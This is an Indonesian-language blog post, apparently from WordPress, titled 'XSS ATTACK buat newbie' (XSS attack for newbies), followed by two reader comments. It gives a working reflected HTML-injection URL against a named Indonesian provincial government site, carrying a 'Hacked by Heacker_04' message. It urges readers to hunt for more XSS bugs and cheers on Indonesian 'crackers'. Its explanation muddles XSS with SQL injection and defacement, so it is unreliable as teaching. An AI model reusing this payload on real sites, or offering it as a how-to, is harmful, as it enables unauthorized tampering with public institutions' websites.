XSS ATTACK buat newbie


Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah mendengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki exploit untuk menjalankan aksi ilegalnya.

Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya “nge-hack website” walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.

Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :

<a href="http://www.jawatengah.go.id/framer.php?SUB=%3Ch1%3EHacked+by+Heacker_04%3Cbr%3E%3Cbr%3E%3Cbr%3ESekedar+Tes+Pak+Admin.....Maaf+Yahh....:D:D:D%3C/h1%3E" target="_blank">http://www.jawatengah.go.id/framer.php?SUB=%3Ch1%3EHacked%20by%20Heacker_04%3Cbr%3E%3Cbr%3E%3Cbr%3ESekedar%20Tes%20Pak%20Admin.....Maaf%20Yahh....:D:D:D%3C/h1%3E</a>

scriptnya gan!!! 🙂

%3Ch1%3EHacked%20by%20Heacker_04%3Cbr%3E%3Cbr%3E%3Cbr%3ESekedar%20Tes%20Pak%20Admin.....Maaf%20Yahh....:D:D:D%3C/h1%3E


intinya xss cuma menambahkan tag html di belakang alamat site..
dan hasilnya cuma bisa di ketahui oleh qt sendiri…

jd kreatif-kreatifnya u ja buat xss bug…
Maju terus Para Cracker Indonesia…Terutama Para Member www[dot]indonesianhacker[dot]or[dot]id.. ^_^V

Salam,

<<- - - - - - ikutisaya- - - - -  ->>

 

4 Responses to XSS ATTACK buat newbie

  1. masih belum jelas gan carana

  2. heacker_04 says:

    artikel yang bagus..tapi alangkah baiknya di cantumkan link dapat dari mana artiketlnya gan..

    salam,

    heacker_04

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: